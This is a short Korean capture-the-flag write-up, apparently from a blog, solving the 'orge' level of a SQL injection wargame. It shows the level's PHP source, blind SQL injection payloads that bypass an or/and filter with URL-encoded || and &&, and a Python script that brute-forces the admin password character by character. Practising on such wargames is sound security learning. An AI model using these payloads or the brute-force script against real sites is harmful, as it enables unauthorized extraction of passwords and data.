query : {$query}
";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "Hello {$result[id]}
";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge");
highlight_file(__FILE__);
?>or과 and가 우회되므로
|| &&을 이용하면 되는데,
&은 특수문자이므로 %26으로 쓰자!
Blind SQL injection으로 admin의 패스워드를 알아낸다!
?pw=1' || id='admin'%26%26length(pw)>5 --%20
?pw=1' || id='admin'%26%26substr(pw,1,1)>char(50) --%20
import requests
def main():
cookie={"__cfduid":"d282347679afbe7ce118657ef96dd67f61530072154","PHPSESSID":"25bfqp0uqr6pmep83spki2t522"}
query='https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php'
x=30
while(1):
x+=1
query_add=query+"?pw=1' || id='admin'%26%26substr(pw,8,1)>char("+str(x)+") --%20"
result=requests.get(query_add, cookies=cookie)
if(result.text.find("Hello")>1000):
print("GOOD : "+str(x))
break
print(x)
if(__name__=="__main__"):
main()